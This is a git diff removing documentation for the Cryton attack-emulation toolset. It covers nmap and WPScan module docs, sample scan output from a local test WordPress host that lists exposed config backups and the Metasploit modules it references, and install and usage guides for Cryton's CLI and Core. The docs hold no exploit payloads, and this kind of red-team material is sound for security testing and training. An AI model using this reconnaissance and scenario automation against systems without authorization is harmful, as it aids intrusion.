key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPkR0kyR7nNOBkue6qsy995GPdpnlnrsbDMkm/8lrx8dTkg+xg5exjZcQeATsNgMbzvwAcm4NXEMg3RNiLAJ4Zo=</elem>\n<elem key="bits">256</elem>\n</table>\n<table>\n<elem key="fingerprint">6136ed35894508e085da45059f70ed15</elem>\n<elem key="type">ssh-ed25519</elem>\n<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIJIkt1AlQN1PvvvgH6AgQjroOF2iIYTC0QFqP0Kfx9bC</elem>\n<elem key="bits">256</elem>\n</table>\n</script></port>\n<port protocol="tcp" portid="111"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="rpcbind" version="2-4" extrainfo="RPC #100000" method="probed" conf="10"/><script id="rpcinfo" output="
 program version port/proto service
 100000 2,3,4 111/tcp rpcbind
 100000 2,3,4 111/udp rpcbind
 100000 3,4 111/tcp6 rpcbind
 100000 3,4 111/udp6 rpcbind
 100024 1 34829/tcp status
 100024 1 35465/udp status
 100024 1 38358/udp6 status
 100024 1 41647/tcp6 status
"><table key="100024">\n<table key="tcp6">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">41647</elem>\n<elem key="owner">107</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="udp">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">35465</elem>\n<elem key="owner">107</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n<table key="udp6">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">38358</elem>\n<elem key="owner">107</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="tcp">\n<table key="version">\n<elem>1</elem>\n</table>\n<elem key="port">34829</elem>\n<elem key="owner">107</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n</table>\n<table key="100000">\n<table key="udp">\n<table key="version">\n<elem>2</elem>\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n<table key="local">\n<table key="version">\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="addr">/run/rpcbind.sock</elem>\n<elem key="owner">superuser</elem>\n</table>\n<table key="tcp6">\n<table key="version">\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="udp6">\n<table key="version">\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">::</elem>\n</table>\n<table key="tcp">\n<table key="version">\n<elem>2</elem>\n<elem>3</elem>\n<elem>4</elem>\n</table>\n<elem key="port">111</elem>\n<elem key="owner">superuser</elem>\n<elem key="addr">0.0.0.0</elem>\n</table>\n</table>\n</script></port>\n</ports>\n<times srtt="484" rttvar="383" to="100000"/>\n</host>\n<runstats><finished time="1660741360" timestr="Wed Aug 17 15:02:40 2022" summary="Nmap done at Wed Aug 17 15:02:40 2022; 1 IP address (1 host up) scanned in 7.65 seconds" elapsed="7.65" exit="success"/><hosts up="1" down="0" total="1"/>\n</runstats>\n</nmaprun>' -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_script.md b/docs/2022.2/modules/mod_script.md deleted file mode 100644 index 5c4f4bc3ef98883417aa229ae40bff0f33739f11..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_script.md +++ /dev/null @@ -1,49 +0,0 @@ -# mod_script - -Module for running custom scripts. - -## System requirements - -There are no system requirements. - -## Input parameters - -Description of input parameters for module. - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|----------------|-----------|---------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `script_path` | Yes | /tmp/script.py | string | - | Full path to the script. | -| `script_arguments` | No | -arg1 example | string | - | Optional arguments for script. | -| `executable` | Yes | python3 | string | - | What should be used to execute the script | -| `serialized_output` | No | true | string | false | Flag whether you want to return the result of the script in `serialized_output`, so that it could be used as input in other modules. **NOTICE: output of the script muse be valid JSON with this option enabled.** | -| `timeout` | No | 60 | int | - | For how long - in seconds - the script should run (overrides args), if not set, module waits until the script finishes. | - -### Example yaml(s) - -```yaml -module_arguments: - script_path: /tmp/example.py - script_arguments: -t 10.10.10.5 - executable: python3 - timeout: 30 -``` - -## Output - -Description of output. - -| Parameter name | Parameter description | -|---------------------|---------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output from the script or any errors that can occur during module execution | -| `serialized_output` | Serialized script output in JSON that can accessed in other modules as input | - -### Example - -```json lines -{ - "serialized_output": None, - "output": "script output", - "return_code": 0 -} -``` \ No newline at end of file diff --git a/docs/2022.2/modules/mod_wpscan.md b/docs/2022.2/modules/mod_wpscan.md deleted file mode 100644 index 3cd29affac4c7fd30065a4eaaf564ea75e7cb10b..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/mod_wpscan.md +++ /dev/null @@ -1,73 +0,0 @@ -# mod_wpscan - -This module runs WPScan on given target and returns a file with found vulnerabilities. - -## System requirements - -For this module to function properly, [WPScan](https://www.kali.org/tools/wpscan/) needs to be installed. - -## Input parameters - -Description of input parameters for module. - -### Parameters with predefined inputs - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|---------------------|----------|---------------------------------|-----------|---------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `target` | Yes | http://127.0.0.1:8000/index.php | string | - | Scan target. | -| `api_token` | No | TOKEN | string | - | The WPScan API Token to display vulnerability data, available at https://wpscan.com/profile. | -| `options` | No | --max-threads 7 | string | - | Additional WPScan parameters. | -| `serialized_output` | No | False | bool | True | Flag for returning json serialized result in `serialized_output`, so that it could be used as input in other modules. **NOTICE: uses `-f json` as a parameter in WPScan command.** | | | | - - -### Parameters with custom nmap command -**NOTICE: For the scan result to be in the `serialized_output`, use `-f json` parameter in the WPScan command** - -| Parameter name | Required | Example value | Data type | Default value | Parameter description | -|------------------|----------|------------------------------------------------------|-----------|---------------|-----------------------------------| -| `custom_command` | Yes | wpscan --url http://127.0.0.1:8000/index.php -f json | string | - | WPScan command as in command line | - - -## Output parameters - -Description of module output. - -| Parameter name | Parameter description | -|---------------------|-------------------------------------------------------------------------------| -| `return_code` | 0 - success<br />-1 - fail | -| `output` | Raw output of WPScan or any errors that can occur during module execution. | -| `serialized_output` | Serialized WPScan output in JSON that can accessed in other modules as input. | - - -## Example yaml(s) with module results - -### Example with serialized output -```yaml -module_arguments: - target: CHANGE_ME - options: --max-threads 7 -``` - -```json lines -{ - 'return_code': 0, - 'output': '', - 'serialized_output': {'banner': {'description': 'WordPress Security Scanner by the WPScan Team', 'version': '3.8.22', 'authors': ['@_WPScan_', '@ethicalhack3r', '@erwan_lr', '@firefart'], 'sponsor': 'Sponsored by Automattic - https://automattic.com/'}, 'start_time': 1667510731, 'start_memory': 50909184, 'target_url': 'http://127.12.0.1/', 'target_ip': '127.12.0.1', 'effective_url': 'http://127.12.0.1/', 'interesting_findings': [{'url': 'http://127.12.0.1/', 'to_s': 'Headers', 'type': 'headers', 'found_by': 'Headers (Passive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {}, 'interesting_entries': ['Server: Apache/2.4.7 (Ubuntu)', 'X-Powered-By: PHP/5.5.9-1ubuntu4.29', 'SecretHeader: SecretValue', 'via: Squid 1.0.0']}, {'url': 'http://127.12.0.1/robots.txt', 'to_s': 'robots.txt found: http://127.12.0.1/robots.txt', 'type': 'robots_txt', 'found_by': 'Robots Txt (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/searchreplacedb2.php', 'to_s': 'Search Replace DB script found: http://127.12.0.1/searchreplacedb2.php', 'type': 'search_replace_db2', 'found_by': 'Search Replace Db2 (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {'url': ['https://interconnectit.com/products/search-and-replace-for-wordpress-databases/']}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/xmlrpc.php', 'to_s': 'XML-RPC seems to be enabled: http://127.12.0.1/xmlrpc.php', 'type': 'xmlrpc', 'found_by': 'Headers (Passive Detection)', 'confidence': 100, 'confirmed_by': {'Link Tag (Passive Detection)': {'confidence': 30}, 'Direct Access (Aggressive Detection)': {'confidence': 100}}, 'references': {'url': ['http://codex.wordpress.org/XML-RPC_Pingback_API'], 'metasploit': ['auxiliary/scanner/http/wordpress_ghost_scanner', 'auxiliary/dos/http/wordpress_xmlrpc_dos', 'auxiliary/scanner/http/wordpress_xmlrpc_login', 'auxiliary/scanner/http/wordpress_pingback_access']}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/readme.html', 'to_s': 'WordPress readme found: http://127.12.0.1/readme.html', 'type': 'readme', 'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/wp-content/debug.log', 'to_s': 'Debug Log found: http://127.12.0.1/wp-content/debug.log', 'type': 'debug_log', 'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'confirmed_by': {}, 'references': {'url': ['https://codex.wordpress.org/Debugging_in_WordPress']}, 'interesting_entries': []}, {'url': 'http://127.12.0.1/wp-cron.php', 'to_s': 'The external WP-Cron seems to be enabled: http://127.12.0.1/wp-cron.php', 'type': 'wp_cron', 'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 60, 'confirmed_by': {}, 'references': {'url': ['https://www.iplocation.net/defend-wordpress-from-ddos', 'https://github.com/wpscanteam/wpscan/issues/1299']}, 'interesting_entries': []}], 'version': {'number': '4.2.34', 'release_date': '0001-01-01', 'status': 'outdated', 'found_by': 'Rss Generator (Passive Detection)', 'confidence': 100, 'interesting_entries': ['http://127.12.0.1/index.php/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>', 'http://127.12.0.1/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>'], 'confirmed_by': {}, 'vulnerabilities': []}, 'main_theme': {'slug': 'twentyfifteen', 'location': 'http://127.12.0.1/wp-content/themes/twentyfifteen/', 'latest_version': '3.3', 'last_updated': '2022-11-02T00:00:00.000Z', 'outdated': True, 'readme_url': 'http://127.12.0.1/wp-content/themes/twentyfifteen/readme.txt', 'directory_listing': False, 'error_log_url': None, 'style_url': 'http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34', 'style_name': 'Twenty Fifteen', 'style_uri': 'https://wordpress.org/themes/twentyfifteen/', 'description': "Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.", 'author': 'the WordPress team', 'author_uri': 'https://wordpress.org/', 'template': None, 'license': 'GNU General Public License v2 or later', 'license_uri': 'http://www.gnu.org/licenses/gpl-2.0.html', 'tags': 'black, blue, gray, pink, purple, white, yellow, dark, light, two-columns, left-sidebar, fixed-layout, responsive-layout, accessibility-ready, custom-background, custom-colors, custom-header, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready', 'text_domain': 'twentyfifteen', 'found_by': 'Css Style In Homepage (Passive Detection)', 'confidence': 70, 'interesting_entries': [], 'confirmed_by': {}, 'vulnerabilities': [], 'version': {'number': '1.1', 'confidence': 80, 'found_by': 'Style (Passive Detection)', 'interesting_entries': ["http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34, Match: 'Version: 1.1'"], 'confirmed_by': {}}, 'parents': []}, 'plugins': {}, 'config_backups': {'http://127.12.0.1/wp-config.old': {'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}, 'http://127.12.0.1/wp-config.php.save': {'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}, 'http://127.12.0.1/wp-config.php~': {'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}, 'http://127.12.0.1/wp-config.txt': {'found_by': 'Direct Access (Aggressive Detection)', 'confidence': 100, 'interesting_entries': [], 'confirmed_by': {}}}, 'vuln_api': {'error': 'No WPScan API Token given, as a result vulnerability data has not been output.\nYou can get a free API token with 25 daily requests by registering at https://wpscan.com/register'}, 'stop_time': 1667510735, 'elapsed': 4, 'requests_done': 139, 'cached_requests': 44, 'data_sent': 34812, 'data_sent_humanised': '33.996 KB', 'data_received': 20794, 'data_received_humanised': '20.307 KB', 'used_memory': 244031488, 'used_memory_humanised': '232.727 MB'} -} -``` - -### Example with text output -```yaml -module_arguments: - target: CHANGE_ME - options: --max-threads 7 - serialized_output: False -``` - -```json lines -{ - 'return_code': 0, - 'output': "_______________________________________________________________\n __ _______ _____\n \\ \\ / / __ \\ / ____|\n \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®\n \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\\n \\ /\\ / | | ____) | (__| (_| | | | |\n \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.17\n Sponsored by Automattic - https://automattic.com/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n\x1b[32m[+]\x1b[0m URL: http://127.12.0.1/ [127.12.0.1]\n\x1b[32m[+]\x1b[0m Started: Mon Nov 7 15:56:24 2022\n\nInteresting Finding(s):\n\n\x1b[32m[+]\x1b[0m Headers\n | Interesting Entries:\n | - Server: Apache/2.4.7 (Ubuntu)\n | - X-Powered-By: PHP/5.5.9-1ubuntu4.29\n | - SecretHeader: SecretValue\n | - via: Squid 1.0.0\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n\x1b[32m[+]\x1b[0m robots.txt found: http://127.12.0.1/robots.txt\n | Found By: Robots Txt (Aggressive Detection)\n | Confidence: 100%\n\n\x1b[32m[+]\x1b[0m Search Replace DB script found: http://127.12.0.1/searchreplacedb2.php\n | Found By: Search Replace Db2 (Aggressive Detection)\n | Confidence: 100%\n | Reference: https://interconnectit.com/products/search-and-replace-for-wordpress-databases/\n\n\x1b[32m[+]\x1b[0m XML-RPC seems to be enabled: http://127.12.0.1/xmlrpc.php\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n | Confirmed By:\n | - Link Tag (Passive Detection), 30% confidence\n | - Direct Access (Aggressive Detection), 100% confidence\n | References:\n | - http://codex.wordpress.org/XML-RPC_Pingback_API\n | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/\n | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/\n | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/\n | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/\n\n\x1b[32m[+]\x1b[0m WordPress readme found: http://127.12.0.1/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n\x1b[32m[+]\x1b[0m Debug Log found: http://127.12.0.1/wp-content/debug.log\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | Reference: https://codex.wordpress.org/Debugging_in_WordPress\n\n\x1b[32m[+]\x1b[0m The external WP-Cron seems to be enabled: http://127.12.0.1/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https://www.iplocation.net/defend-wordpress-from-ddos\n | - https://github.com/wpscanteam/wpscan/issues/1299\n\n\x1b[32m[+]\x1b[0m WordPress version 4.2.34 identified (Outdated, released on 0001-01-01).\n | Found By: Rss Generator (Passive Detection)\n | - http://127.12.0.1/index.php/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>\n | - http://127.12.0.1/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.2.34</generator>\n\n\x1b[32m[+]\x1b[0m WordPress theme in use: twentyfifteen\n | Location: http://127.12.0.1/wp-content/themes/twentyfifteen/\n | Last Updated: 2022-11-02T00:00:00.000Z\n | Readme: http://127.12.0.1/wp-content/themes/twentyfifteen/readme.txt\n | \x1b[33m[!]\x1b[0m The version is out of date, the latest version is 3.3\n | Style URL: http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34\n | Style Name: Twenty Fifteen\n | Style URI: https://wordpress.org/themes/twentyfifteen/\n | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...\n | Author: the WordPress team\n | Author URI: https://wordpress.org/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.1 (80% confidence)\n | Found By: Style (Passive Detection)\n | - http://127.12.0.1/wp-content/themes/twentyfifteen/style.css?ver=4.2.34, Match: 'Version: 1.1'\n\n\x1b[32m[+]\x1b[0m Enumerating All Plugins (via Passive Methods)\n\n\x1b[34m[i]\x1b[0m No plugins Found.\n\n\x1b[32m[+]\x1b[0m Enumerating Config Backups (via Passive and Aggressive Methods)\n\n Checking Config Backups -: |==================================================|\n\n\x1b[34m[i]\x1b[0m Config Backup(s) Identified:\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.old\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.php.save\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.php~\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[31m[!]\x1b[0m http://127.12.0.1/wp-config.txt\n | Found By: Direct Access (Aggressive Detection)\n\n\x1b[33m[!]\x1b[0m No WPScan API Token given, as a result vulnerability data has not been output.\n\x1b[33m[!]\x1b[0m You can get a free API token with 25 daily requests by registering at https://wpscan.com/register\n\n\x1b[32m[+]\x1b[0m Finished: Mon Nov 7 15:56:34 2022\n\x1b[32m[+]\x1b[0m Requests Done: 139\n\x1b[32m[+]\x1b[0m Cached Requests: 44\n\x1b[32m[+]\x1b[0m Data Sent: 34.132 KB\n\x1b[32m[+]\x1b[0m Data Received: 20.307 KB\n\x1b[32m[+]\x1b[0m Memory used: 243.156 MB\n\x1b[32m[+]\x1b[0m Elapsed time: 00:00:10\n", - 'serialized_output': {} -} -``` diff --git a/docs/2022.2/starting-point/cli.md b/docs/2022.2/starting-point/cli.md deleted file mode 100644 index 4daf0e0e1a2b10ae25d2c84e2b9fce1c82ec2d0e..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/cli.md +++ /dev/null @@ -1,262 +0,0 @@ -## Description -Cryton CLI is a command line interface used to interact with [Cryton Core](core.md) (its API). - -To be able to execute attack scenarios, you also need to install **[Cryton Core](core.md)** -and **[Cryton Worker](worker.md)** tools. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-cli). - -## Settings -Cryton CLI uses environment variables for its settings. Please update them to your needs. - -| name | value | example | description | -|---------------------------|---------|----------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| CRYTON_CLI_TIME_ZONE | string | AUTO | What [timezone](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones) to use for scheduling (for example when scheduling a Run). <br> Use the `AUTO` value to use your system timezone. | -| CRYTON_CLI_API_HOST | string | 127.0.0.1 | Cryton Core's API address. | -| CRYTON_CLI_API_PORT | int | 8000 | Cryton Core's API port. | -| CRYTON_CLI_API_SSL | boolean | false | Use SSL to connect to REST API. | -| CRYTON_CLI_API_ROOT | string | api/ | REST API URL. **(do not change, if you don't know what you're doing)** | -| CRYTON_CLI_APP_DIRECTORY | string | ~/.local/cryton-cli/ | Path to the Cryton CLI directory. **(do not change/set/export, if you don't know what you're doing)** <br> If changed, update the commands in this guide accordingly. | - -To save the settings **create an app directory**: -```shell -mkdir ~/.local/cryton-cli/ -``` - -Next, we download example settings (**change the version to match the app version**): -```shell -curl -o ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/<version>/.env -``` - -Update these settings to your needs. - -### Overriding the settings -To override the persistent settings, you can set/export the variables yourself using the **export** command -(use **unset** to remove the variable). For example: -```shell -export CRYTON_CLI_API_HOST=127.0.0.1 -``` - -Some environment variables can be overridden in CLI. Try using `cryton-cli --help`. - -## Installation -Cryton CLI is available in the [PyPI](https://pypi.org/project/cryton-cli/) and can be installed using *pip* (`pip install --user cryton-cli`). -However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). - -### Requirements -Install the following requirements: -- [Python](https://www.python.org/about/gettingstarted/) >=3.8 -- [pipx](https://pypa.github.io/pipx/) - -### Installing with pipx -Once you have *pipx* ready on your system, you can start the installation: -```shell -pipx install cryton-cli -``` - -Make sure you've correctly set the [settings](#settings). - -Optionally, you can set up [shell completion](#shell-completion). - -Everything should be set, check out the [usage section](#usage). - -## Development -To install Cryton CLI for development, you must install [Poetry](https://python-poetry.org/docs/). - -Clone the repository: -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-cli.git -``` - -Then go to the correct directory and install the project: -```shell -cd cryton-cli -poetry install -``` - -To spawn a shell use: -```shell -poetry shell -``` - -Make sure you've correctly set the [settings](#settings). -To override the settings quickly, you can use this handy one-liner: -```shell -export $(grep -v '^#' .env | xargs) -``` - -Optionally, you can set up [shell completion](#shell-completion). - -Everything should be set. Check out the [usage section](#usage). - -## Usage -Use the following to invoke the app: -```shell -cryton-cli -``` - -You should see a help page: -``` -Usage: cryton-cli [OPTIONS] COMMAND [ARGS]... - - A CLI wrapper for Cryton API. - -Options: - ... -``` - -**Please keep in mind that the [Cryton Core](core.md) -must be running and its API must be reachable.** - -To change the default API host/port use *-H* and *-p* options (to change them permanently, see the [settings section](#settings)). -```shell -cryton-cli -H 127.0.0.1 -p 8000 <your command> -``` - -**To learn about each command's options use**: -```shell -cryton-cli <your command> --help -``` - -For a better understanding of the results, we highlight the successful ones with **green** and the others with **red** color. - -### Example -#### 1. Create plan template -Create a plan template using a file containing the desired plan YAML. -```shell -cryton-cli plan-templates create my-plan.yml -``` - -Desired output: -``` -Template successfully created! (<response detail>). -``` - -#### 2. Create Plan instance -Create a Plan instance with the saved plan template. -```shell -cryton-cli plans create 1 -``` - -Create a Plan instance using the template and an inventory file. -```shell -cryton-cli plans create 1 -i inventory_file -``` - -Desired output: -``` -Plan successfully created! (<response detail>). -``` - -#### 3. Create Worker -To execute Plans (Runs) we have to define a Worker(s). -```shell -cryton-cli workers create customName -d "This is my first Worker!" -``` - -Desired output: -``` -Worker successfully created! (<response detail>). -``` - -#### 4. Create Run -Create a Run by choosing a Plan instance and providing a list of Workers for execution. -```shell -cryton-cli runs create 1 1 -``` - -Desired output: -``` -Run successfully created! (<response detail>). -``` - -#### 5. Schedule or execute Run -You can either schedule the Run for a specific date/time or execute it directly. Run will then be executed on every Worker -simultaneously. - -**Execute Run** -```shell -cryton-cli runs execute 1 -``` - -Desired output: -``` -Run successfully executed! (Run 1 was executed.). -``` - -**Schedule Run** -You can schedule a Run using the local timezone. -```shell -cryton-cli runs schedule 1 2020-06-08 10:00:00 -``` - -Desired output: -``` -Run successfully scheduled! (Run 1 is scheduled for 2020-06-08 10:00:00.). -``` - -Or you can schedule it using UTC timezone with the flag `--utc-timezone`. Otherwise, your preset timezone is used. - -#### 6. Read Run report -A report can be generated anytime during the execution (also compliant with YAML format). It contains a list of -Stages/Steps and their results. -```shell -cryton-cli runs report 1 -``` - -Desired output: -``` -Successfully created Run's report! (file saved at: /tmp/report_run_1_2020-06-08-10-15-00-257994_xdQeV) -``` - -Timestamps are displayed in UTC timezone by default. Use the `--localize` flag to display them using your preset timezone. - -## Shell completion -Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled (**the tool must be installed first**). - -### Bash -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-cli/ -``` - -Generate and save the completion script: -```shell -_CRYTON_CLI_COMPLETE=bash_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.bash -``` - -Source the file in the `~/.bashrc` file: -```shell -echo ". ~/.local/cryton-cli/cryton-cli-complete.bash" >> ~/.bashrc -``` - -You may need to restart your shell for the changes to take effect. - -### Zsh -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-cli/ -``` - -Generate and save the completion script: -```shell -_CRYTON_CLI_COMPLETE=zsh_source cryton-cli > ~/.local/cryton-cli/cryton-cli-complete.zsh -``` - -Source the file in the `~/.zshrc` file: -```shell -echo ". ~/.local/cryton-cli/cryton-cli-complete.zsh" >> ~/.zshrc -``` - -You may need to restart your shell for the changes to take effect. - -### Fish -Generate and save the completion script: -```shell -_CRYTON_CLI_COMPLETE=fish_source cryton-cli > ~/.config/fish/completions/cryton-cli-complete.fish -``` - -You may need to restart your shell for the changes to take effect. diff --git a/docs/2022.2/starting-point/core.md b/docs/2022.2/starting-point/core.md deleted file mode 100644 index ffbcd58a1fd983beb9bd1f3a776c54a8640ac7fb..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/core.md +++ /dev/null @@ -1,355 +0,0 @@ -## Description -Cryton Core is the center point of the Cryton toolset. It is used for: -- Creating, planning, and scheduling attack scenarios. -- Generating reports from attack scenarios. -- Controlling Workers and scenarios execution. - -To be able to execute the attack scenarios, you -also need to install the **[Cryton Worker](worker.md)** -and **[Cryton CLI](cli.md)** package. Optionally you can install -[Cryton Frontend](frontend.md) for non-command line experience. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-core). - -## Settings -Cryton Core uses environment variables for its settings. Please update them to your needs. - -| name | value | example | description | -|-------------------------------------------|------------------------------------|------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| CRYTON_CORE_RABBIT_HOST | string | 127.0.0.1 | RabbitMQ server host. | -| CRYTON_CORE_RABBIT_PORT | int | 5672 | RabbitMQ server port. | -| CRYTON_CORE_RABBIT_USERNAME | string | admin | Username for RabbitMQ server login. | -| CRYTON_CORE_RABBIT_PASSWORD | string | mypass | Password for RabbitMQ server login. | -| CRYTON_CORE_DB_HOST | string | 127.0.0.1 | Postgres server host. | -| CRYTON_CORE_DB_PORT | int | 5432 | Postgres server port. | -| CRYTON_CORE_DB_NAME | string | cryton | Used Postgres database name. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_DB_USERNAME | string | cryton | Username for Postgres server login. | -| CRYTON_CORE_DB_PASSWORD | string | cryton | Password for Postgres server login. | -| CRYTON_CORE_Q_ATTACK_RESPONSE | string | cryton_core.attack.response | Queue name for processing attack responses. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_Q_AGENT_RESPONSE | string | cryton_core.agent.response | Queue name for processing agent responses. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_Q_EVENT_RESPONSE | string | cryton_core.event.response | Queue name for processing event responses. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_Q_CONTROL_REQUEST | string | cryton_core.control.request | Queue name for processing control requests. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_DEBUG | boolean | false | Make Core run with debug output. | -| CRYTON_CORE_TZ | string | UTC | Internally used timezone. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_DEFAULT_RPC_TIMEOUT | int | 120 | Timeout (in seconds) for RabbitMQ RPC requests. | -| CRYTON_CORE_API_SECRET_KEY | string | XF37..56 chars..6HB3 | Key (64 chars) used by REST API for cryptographic signing. More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#secret-key). | -| CRYTON_CORE_API_PUBLIC_PORT | int | 8000 | Port on which the Apache reverse proxy will be served (this only affects the *cryton_apache* Compose configuration). | -| CRYTON_CORE_API_ALLOWED_HOSTS | list of strings separated by space | * | Domain names that the site can serve. **(do not change, if you don't know what you're doing)** <br> More information can be found [here](https://docs.djangoproject.com/en/4.1/ref/settings/#allowed-hosts). | -| CRYTON_CORE_API_STATIC_ROOT | string | /var/www/example.com/static/ | Directory for storing static files. **(do not change, if you don't know what you're doing)** <br> More information can be found [here](https://docs.djangoproject.com/en/4.0/ref/settings/#static-root). | -| CRYTON_CORE_API_USE_STATIC_FILES | boolean | true | Whether to serve static files or not. **(do not change, if you don't know what you're doing)** | -| CRYTON_CORE_CPU_CORES | int | 3 | The maximum number of CPU cores (processes) Cryton Core can utilize. **(do not change/set/export, if you don't know what you're doing)** <br> This affects the speed of starting/consuming Steps/Rabbit requests. Set value to `auto` for the best CPU utilization. | -| CRYTON_CORE_EXECUTION_THREADS_PER_PROCESS | int | 7 | How some payloads or Rabbit's channel consumers should be distributed. **(do not change/set/export, if you don't know what you're doing)** <br> This affects the speed of starting/consuming Steps/Rabbit requests. | -| CRYTON_CORE_APP_DIRECTORY | string | ~/.local/cryton-core/ | Path to the Cryton Core directory. **(do not change/set/export, if you don't know what you're doing)** <br> If changed, update the commands in this guide accordingly. | - -To save the settings **create an app directory**: -```shell -mkdir ~/.local/cryton-core/ -``` -The directory will be also used to store logs and other data created by Cryton Core. -**This doesn't apply to the Docker installation.** It will be available in the same directory as the Dockerfile -(`/path/to/cryton-core/cryton-core`). - -To make the installation easier, we need to set our target version first. Versions can be found 